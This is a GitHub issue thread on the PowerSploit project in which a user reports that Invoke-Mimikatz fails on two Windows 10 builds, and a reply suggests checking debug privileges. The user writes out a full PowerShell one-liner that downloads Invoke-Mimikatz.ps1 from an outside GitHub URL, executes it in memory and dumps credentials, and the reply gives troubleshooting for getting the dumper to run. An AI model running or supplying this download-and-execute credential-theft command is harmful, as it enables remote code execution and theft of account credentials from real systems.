PowerShellMafia/PowerSploit

Mimkatz not working on windows 10.

exrme18 opened this issue · 2 comments

Hello,
I am trying to invoke the mimikatz but getting the following error:

screenshot 2019-03-06 at 7 34 05 pm

I have tried on two different versions: Windows Version Details-
Win-10 Version 1803 (Build 17134.165)
Win-10 Version 1809 (Build 17763.107) October build.

Command used:

IEX (New-Object System.Net.Webclient).DownloadString(‘https://raw.githubusercontent
.com/EmpireProject/Empire/7efb7eeaabeb3daf916ead7856bb621bbca331f4/data/module_source/credentials/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds

Similarly I have tried dev and master ps but none of them worked for me.
Any solution would be appreciated
Thanks

Does the account you're using to run that PowerShell instance have the right to debug programs? You can check in Local Security Policy > User Rights Assignment or running the privilege::debug command using Mimikatz